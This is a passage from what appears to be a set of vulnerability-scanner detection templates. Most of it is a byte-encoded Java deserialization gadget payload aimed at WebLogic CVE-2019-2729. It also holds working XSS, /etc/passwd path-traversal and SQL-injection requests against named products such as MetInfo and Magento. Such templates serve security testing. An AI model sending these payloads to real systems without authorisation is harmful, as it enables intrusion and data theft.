index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7139","info":{"name":"Magento - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"text/x-magento-init\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1\nHost: {{Hostname}}\n","GET 